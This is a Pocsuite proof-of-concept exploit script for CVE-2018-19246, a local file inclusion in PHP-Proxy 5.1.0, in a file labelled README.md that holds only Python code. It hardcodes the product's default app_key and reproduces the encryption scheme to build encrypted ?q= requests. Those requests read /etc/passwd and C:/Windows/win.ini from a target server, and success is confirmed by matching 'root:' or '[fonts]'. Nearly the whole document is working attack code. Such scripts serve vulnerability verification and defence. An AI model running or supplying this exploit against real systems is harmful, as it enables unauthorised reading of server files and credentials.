README.md
Rendering markdown...
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pocsuite.api.request import req
from pocsuite.api.poc import register, Output, POCBase
from pocsuite.thirdparty.guanxing import parse_ip_port, http_packet, make_verify_url
from hashlib import md5
from base64 import b64encode
from string import maketrans
import socket
class TestPOC(POCBase):
vulID = ''''''
cveID = '''CVE-2018-19246'''
cnvdID = ''''''
cnnvdID = ''''''
version = '''5.1.0'''
author = ''''''
vulDate = '''2018-11-13'''
createDate = ''''''
updateDate = ''''''
name = '''PHP-Proxy 5.1.0 - Local File Inclusion'''
desc = '''Downloadable pre-installed version of PHP-Proxy 5.1.0 make use of a default app_key wherein can be used for local file inclusion attacks. This can be used to generate encrypted string which can gain access to arbitrary local files in the server. http://php-proxy-site/index.php?q=[encrypted_string_value]'''
solution = '''Use the setup.txt script included on the downloadable pre-installed version of PHP-Proxy to generate and overwrite the default app_key'''
severity = '''7.5 HIGH'''
vulType = ''''''
taskType = ''''''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['']
install_requires = ['''''']
def str_rot_pass(self, content, cipher, decrypt=False):
cipher_len = len(cipher)
str_len = len(content)
result = ''
for i in range(str_len):
asc = ord(content[i]) - ord(cipher[i % cipher_len]) if decrypt else ord(content[i]) + ord(cipher[i % cipher_len])
result += chr(asc)
return result
def base64_url_encode(self, content):
table = maketrans('+/', '-_')
return b64encode(content).translate(table).rstrip('=')
def _verify(self):
self.url, ip, port = parse_ip_port(self.target, 80)
result = {}
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
files = ['file:///etc/passwd', 'file:///C:/Windows/win.ini']
checkings = ['root:', '[fonts]']
# 生成一个 UDP 包以获取用来访问网站的 ip
u_ip = '127.0.0.1'
try:
so = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
so.connect((ip, 80))
u_ip = so.getsockname()[0]
finally:
so.close()
app_key = 'aeb067ca0aa9a3193dce3a7264c90187'
key = md5(app_key + u_ip).hexdigest()
paths = ['?q=' + self.base64_url_encode(self.str_rot_pass(file, key)) for file in files] # 漏洞的路径
for i in range(len(paths)):
path = paths[i]
vul_url = make_verify_url(self.url, path, mod=0) # 生成完整路径
data = '' # 漏洞的data数据
resp = req.get(vul_url,
headers=headers,
data=data,
verify=False,
allow_redirects=False,
timeout=10)
if resp.status_code == 200 and checkings[i] in resp.content: # 判断条件
result['VerifyInfo'] = http_packet(resp)
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['port'] = port
break
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Failed')
return output
register(TestPOC)